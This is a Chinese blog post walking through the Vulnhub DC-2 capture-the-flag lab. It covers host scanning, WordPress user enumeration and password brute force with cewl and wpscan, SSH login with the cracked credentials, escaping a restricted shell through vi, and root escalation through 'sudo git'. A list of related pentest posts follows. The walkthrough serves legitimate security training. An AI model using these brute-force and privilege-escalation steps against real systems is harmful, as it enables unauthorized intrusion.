DC-2靶机详情

于 2024-09-14 10:38:01 发布
阅读量676 收藏 8
点赞数 8
文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyanglailo/article/details/142252370
版权

扫描信息

DC-2的mac地址为

  • netdiscover
  • arp-scan -l

得出DC-2的地址为192.168.150.151

nmap -p- -sV -sT -A -O 192.168.150.151

把IP 和域名写入 hosts 文件中

sudo nano /etc/hosts

访问http://192.168.150.151/

对网站做一个目录扫描

dirb http://dc-2/

发现后台

http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1

用户名枚举

前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描 Wpscan一些常用语句 
wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户

扫描wordpress版本

wpscan --url http://dc-2

发现是4.7.10版本

现在开始尝试登入

随便输入一个账号密码发现是无用的用户

来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

发现三个用户

暴力破解出账号密码

可以用burp抓包,也可以简单点

因为知道了是wpscan

所以 使用cewl生成字典,使用wpscan进行暴力破解

cewl http://dc-2 . > .1.txt


wpscan --url http://dc-2 --passwords 1.txt

得到的结果m

jerry adipiscing

tom parturient

登入账号
jerry/adipiscing登录此站点

发现

使用ssh登入

```plain ssh tom@192.168.150.151 -p 7744 jerry/adipiscing tom/parturient ```

查看一下权限
whoami

发现有rbash限制(可以理解为很低权限的用户吧)

vi进入编辑器

然后按Esc键,输入

:set shell=/bin/bash

然后回车输入:shell

最后回车退出

可以发现权限升级为bash

vi随便打开文件

再下面添加

:set shell=/bin/sh

:shell

已经升级为bash了,无法执行cat命令是因为环境变量的问题,用以下命令添加一下两条路径即可

export PATH=$PATH:/bin/
 
export PATH=$PATH:/usr/bin/

。。

查看flag4.txt

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

提权成功

x

切换用户
![](https://img-blog.csdnimg.cn/img_convert/b64cb3420a318e1910dd09eff327270e.png)

sudo -l

然后开始提权

sudo git help config
回车输入
!/bin/bash

成功切换root用户
cd / 进入根目录

find / -name flag

寻找flag文件

cat /root/final*

总结

1字典生成工具cewl
利用爬虫爬取网站,根据网站特点生成字典

Cewl!利用爬虫来生成字典 - 知乎 (zhihu.com)

2扫描工具WPScan(只适用于WordPress)
> [Kali(渗透工具):WPScan的使用(WordPress扫描工具) - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/149725645) >
  • 用户名枚举

wpscan --url 网站地址 -e u

-e表示枚举类型,u表示用户名。这两个配合使用是枚举用户名

  • 密码爆破

wpscan --url 网站地址 -U 用户名字典 -P 密码字典

3. Linux的一些命令
+ ** 编辑器命令**

vi(或vim)

可配合提权操作,进去后,按Esc键可执行操作,输入一下命令

:set shell=/bin/bash(bash可以用sh代替)
:shell
  • 环境变量查看(一般用于查看可执行命令)

echo $PATH

记住$PATH的值,比如输出/home/jerry/bin

echo path路径下的文件

  • 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
  • 用户切换

su 用户名

秋喜秋
关注
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Linux 进程控制
2302_77289177的博客
09-08 1282
Linux 进程控制
Linux】:信号与信号产生
Yikefore的博客
09-12 785
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
高效诊断Linux性能问题
Tiger93的博客
09-08 554
诊断Linux性能问题
.Net 执行Linux下多行shell命令方法
xk_hypothesis的博客
09-10 401
2.使用 3.解释 规范化换行符:使用 NormalizeNewlines 方法将所有换行符替换为 LF(\n)。 这样可以确保在 Linux 系统上执行时不会出现问题。 执行 Shell 命令:使用 ProcessStartInfo 配置进程启动信息。 设置 FileName 为 /bin/bash。 设置 Arguments 为执行命令所需的参数,使用 -c 参数来执行命令。 设置 UseShellExecute 为 false,以便更好地控制进程。 设置 RedirectStandardOutput
Linux之MySQL主从复制
2302_79087378的博客
09-08 1489
MySQL的主从复制()是一种数据复制解决方案,将主数据库的DDL(数据定义语言)和DML(数据操纵语言)操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行(也叫重做),从而是的从库和主库的数据保存同步。MySQL支持将数据从一个MySQL服务器(主服务器)复制到一个或多个其他MySQL服务器(从服务器),从库同时也可以作为其他从服务器的主库,实现链状复制。MySQL主从复制的优点主要包含以下三个方面:主库出现问题,可以快速切换到从库提供服务;实现读写分离,降低主库的访问压力;
Linux 下 C/C++ 程序编译的过程
Teminator_的博客
09-08 9359
本文将介绍如何将 C/C++ 语言编写的程序转换成为处理器能够执行的二进制代码的过程,包括四个步骤:预处理()编译()汇编()链接(在此之前,首先来看一下 GCC 工具链。
LinuxLinux 可重入函数
2403_86785171的博客
09-08 1036
简单来说,可重入函数是线程安全的函数。当函数正在执行时,如果它被其他线程或中断再次调用,它能够正确处理这种情况。不使用静态或全局变量,或仅使用局部变量。不依赖非线程安全的库函数,如malloc或strtok。不修改输入参数。如果函数需要访问共享资源,则必须使用同步机制(如锁或信号量)来避免竞态条件。
直播相关01-录制麦克风声音,QT上 .pro 将 linux,mac和windows上配置为三种可以共享, 在.pro文件中 message 的作用
hunandede的博客
09-09 654
一 QT 上的 .pro 文件将 linux,mac和windows上配置设置为可以共享 1. 先来看文件夹布局 2. 再来看 QT 中的 .pro文件
LINUX】在ubuntu中安装tomcat
09-11 231
#instal jdk apt install openjdk-8-jdk -y#enter install path cd /home/a/#copy tomcat package cp /mnt/hgfs/Share/apache-tomcat-9.0.93.tar.gz .#unpress tomcat package tar -xf apache-tomcat-9.0.93.tar.gz #enter bin path cd apache-tomcat-9.0.93/bin#start the se
Linux xargs命令
菜鸟记录
09-08 1129
Linux xargs命令
linux 中删除乱码中文名文件
她的吻让他
09-13 120
在操作linux时会不经意将带有中文的文件发送到linux系统,但是有些linux系统不能识别中文以及中文符号等,会导致linux shell命令无法操作这些文件。想要删除无法识别名字的文件,需要找到其inode 号,通过inode 删除文件。find . -inum inode号 -exec rm {} \;整体操作分为两条指令。
linux实用操作
最新发布
lonelyxxyo的博客
09-13 1316
环境变量PATH这个项目里面记录了系统执行命令的搜索路径。这些搜索路径我们也可以自行添加到PATH中去。黑马教学案例:测试:在当前HOME目录内创建文件夹,myenv,在文件夹内创建文件mkhaha通过vim编辑器,在mkhaha文件内填入:echo 哈哈哈哈哈完成上述操作后,随意切换工作目录,执行mkhaha命令尝试一下,会发现无法执行修改PATH的值。
Linux-------基础
weixin_69190490的博客
09-09 412
2、安装 Ubuntu Linux 会自带 unity桌面环境,操作方便。shutdown 9:00 在 9 点关机 【1-24小时制】1、拥有完整图形化界面,是面向普通用户对象,比较容易上手。sudo -i 切换到 root (超级管理员)shutdown 【+】分钟 在多少分钟之后关机。shutdown -h now 立即关机。halt 关机 (需要 root 权限)开放性、安全性、多用户性、网络性。shutdown 一分钟之后关机。su 用户名 切换到对应的用户。exit 注销/推出。
C++ linux下的cmake
JackerCSDN的博客
09-08 456
cmake简单使用
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值